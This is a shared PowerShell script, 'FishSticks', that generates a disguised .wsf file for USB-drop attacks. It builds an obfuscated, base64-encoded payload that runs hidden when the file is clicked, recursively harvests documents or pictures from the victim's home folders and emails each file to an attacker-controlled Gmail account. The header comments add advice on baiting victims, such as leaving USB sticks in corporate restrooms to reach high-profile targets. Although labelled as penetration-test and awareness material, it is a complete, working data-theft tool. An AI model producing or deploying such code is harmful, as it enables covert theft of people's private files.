opexxx
2/12/2017 - 11:47 AM

Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders

Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.

FishSticks.ps1
content_copyfile_download
 <#
.Synopsis
    ____ _    _    ___ _   _    _       
    | __(_)__| |_ / __| |_(_)__| |__ ___
    | _|| (_-< ' \\__ \  _| / _| / /(_-<
    |_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1

   "Life is like a box of FishSticks, you never know what you're gonna get..." 
    
    Benjamin Buford "Bubba" Blue - 1965. 
    [Shrimping Legend] 

.DESCRIPTION
   # Category: Security Awareness / PenTests / Phishing Campaigns.

   This Cmdlet generates a nefarious base64 encoded powershell command wrapped in a .wsf file used 
   to demonstrate 'Mystery Phishing' Attacks (aka USB-Drop Attacks). 
   -> A subtle mix between X-mas Eve & Fishing with Dynamite... 
   
   When file clicked:
   - Collects all files with specified -Extensions from specified -Folder (recursively) on victim's machine
   - Exfils all collected files to the specified attacker's -Gmail/-Password.
   Attacker simply has to wait... Nothing noticable on victim's side, the file just doesn't open.
   
   Can aslo generate only the raw base64 encoded scriptblock or a ready-to-run Powershell command, 
   and output to Clipboard instead of File.
   

   # Tip1: Serve FishSticks with Fresh Salad / Garlic Sauce / Lemon slice / French Fries... You're the Chef.
   -> Add other 'legit' files to usb. Rename attractively. Use imagination to increase click rate... Its all about storytelling.
   # Tip2: Not all fish swim in the same ponds... Choose your spot.
   -> Drop in men toilets of fancy business hotel / corporate building = high profile victims.
   
   # Note: Mostly for random target attacks, but can also be used against specific victim (requires more social engineering)
   # Tech: Requires Powershell v4+ on target machine (w81+).

   # Author: Walter Legowski aka @SadProcessor
   # Demo: https://youtu.be/hpHML5Bjt9g

.EXAMPLE
   New-FishStick -Gmail 'JunkEmail@Gmail.com' -Password 'ThrowAwayPassword'
   Outputs .wsf to File -> Collects all .docx .pdf and .txt from victim's Desktop and subs, then sends to specified Gmail/Password.
.EXAMPLE
   New-FishStick -Gmail 'JunkEmail@Gmail.com' -Password 'ThrowAwayPassword' -TargetFolder All -Extensions 'pptx','docx','xlsx','pdf'
   Outputs .wsf to File -> Collects all .pptx .docx .xlsx and .pdf from victim's Home folder and subs, then sends to specified Gmail/Password.
.EXAMPLE
   New-FishStick -Gmail 'JunkEmail@Gmail.com' -Password 'ThrowAwayPassword' -TargetFolder Pictures -Extensions 'jpg','png' -Output Raw64 -To Clipboard
   Outputs Raw base64 Scriptblock to Clipboard -> Collects all .jpg and .png from victim's Pictures folder and subs, then sends to specified Gmail/Password.
#>
function New-FishStick{
    [CmdletBinding()]Param(
        
        # Mandatory: Specify attacker -Gmail address for file collection
        [Parameter(Mandatory=$true)][ValidatePattern("@gmail.")][string]$Gmail,

        # Mandatory: Specify -Password for that Gmail account <------------/!\ Not Secure /!\
        [Parameter(Mandatory=$true)][string]$Password,
        
        # Specify -TargetFolder Desktop|Documents|Downloads|Pictures|All
        # #Default is Desktop, All is $env:HOMEPATH
        [Parameter(Mandatory=$false)][ValidateSet('Desktop','Documents','Downloads','Pictures','All')][string]$TargetFolder = 'Desktop',
        
        # Specify targeted file -Extentions 
        # # Letters only ex: 'pptx','docx','xlsx','pdf'
        # # Default is 'docx','pdf','txt'
        [Parameter(Mandatory=$false)][string[]]$Extensions = ('docx','pdf','txt'),

        # Specify -Output Raw64|Com64|wsf
        # # Default is wsf
        [Parameter(Mandatory=$false)][ValidateSet('Raw64','Com64','wsf')][string]$Output = 'wsf',

        # Specify -To File|Clipboard
        # #Default is File
        [Parameter(Mandatory=$false)][ValidateSet('File','Clipboard')][string]$To = 'File'
    )

 
### Action

## Generate base64 encoded Scriptblock
# Fix -Folder to path
$Target = $Targetfolder
if($TargetFolder -eq 'All'){$Target = ''}
$Folder = "`$env:HOMEPATH\$Target"

# Fix extensions string syntax
$ExtString = ''
foreach($ex in $Extensions){$ExtString += "'*.$Ex',"}
# Remove last comma
$ExtString = $ExtString -replace “.$”

# Generate Textblock
$Block = @("`$a=`"$Gmail`";`$p=CoNVeRtTo-SeCUReStRInG ‘$Password’ -A -F;`$e=$ExtString;`$t=`"$Folder\*`";`$c=NeW-ObjeCT System.Management.Automation.PSCredential (`$a,`$p);`$f=(gCi `$t -R -I `$e).FullName;FOrEACh(`$x in `$f){`$zz=@{SmtpServer='smtp.gmail.com';Port=587;UseSsl=`$trUE;Credential=`$c;From=`$a;To=`$a;Subject=`"`$eNv:CoMPutErnAME/`$EnV:USeRNamE`";Body=`"`$x`";Attachments=`$x};sENd-MAilMeSsaGe @zz;sLEEp -S ((-2..2 | geT-RAnDOM)+3)}")

# Convert to Base64
$B64 =[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($block))

 
## -Output Raw64|Com64|wsf
# if -Output Raw64
if($Output -eq 'raw64'){
    $Content = $B64
    $FileName = 'FishStick_Raw64.txt'
    }

# if -Output Com64
if($Output -eq 'Com64'){
    # Generate full powershell base64 encoded command 
    $Content = "powershell.exe -NoP -sta -NonI -W Hidden -Enc $B64"
    $FileName = 'FishStick_Com64.txt'
    }

# if -Output wsf
if($Output -eq 'wsf'){
    # Generate wsf content
    $Content = @("<?xml version=`"1.0`" ?>
	<job>
		<script language=`"VBScript`">
     			<![CDATA[Dim objShell
Set objShell = WScript.CreateObject(`"WScript.Shell`")
command = `"powershell.exe -NoP -sta -NonI -W Hidden -Enc $B64`"
objShell.Run command,0
Set objShell = Nothing]]>
		</script>
	</job>
")
    $FileName = './FishStick.wsf'
    }

 
## -To File|Clipboard
# If -To File
If($To -eq 'File'){
    # Output file
    New-Item -Path "$FileName" -Value "$Content" -Force
    }

# If -To Clipboard
If($To -eq 'Clipboard'){
    # Set Clipboard
    $Content | Set-Clipboard
    }

}

 
### Done